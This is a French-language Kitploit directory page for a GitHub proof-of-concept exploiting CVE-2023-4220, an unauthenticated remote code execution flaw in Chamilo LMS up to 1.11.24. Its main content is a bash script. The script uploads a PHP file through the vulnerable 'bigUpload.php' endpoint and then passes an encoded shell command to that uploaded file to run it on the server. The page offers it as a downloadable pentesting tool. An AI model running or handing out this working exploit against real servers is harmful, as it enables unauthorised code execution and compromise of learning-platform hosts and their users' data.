Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-4220 — RCE Chamilo 1.11.24 | Kitploit
Outils/GitHubGitHub/charlesgargasson/cve-2023-4220
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubcharlesgargasson/cve-2023-4220

CVE-2023-4220

RCE Chamilo 1.11.24

Voir le dépôt
11il y a 2 ansPas encore vérifié
Site web

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

################################# CVE-2023-4220 RCE Chamilo 1.11.24 #################################

| https://starlabs.sg/advisories/23/23-4220/ | Chamilo LMS <= 1.11.24 (Beersel 31/08/2023) | Exécution de code à distance non authentifiée via fichier sur la bibliothèque "Big Upload" | Identifier la version : /documentation/changelog.html | POC EXPLOIT CVE RCE VULN

.. code-block:: bash

#!/bin/bash HOST='http://lms.domain.com' CMD='id'

URL_UPLD='main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported' URL_FILE='main/inc/lib/javascript/bigupload/files/rce.php'

cat <<'EOF'>/tmp/rce.php

EOF

curl -F 'bigUploadFile=@/tmp/rce.php' "$HOST/$URL_UPLD" CMD=$(echo $CMD|base64 -w0| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))") curl "$HOST/$URL_FILE?aoOoy=$CMD"

Télécharger l’outil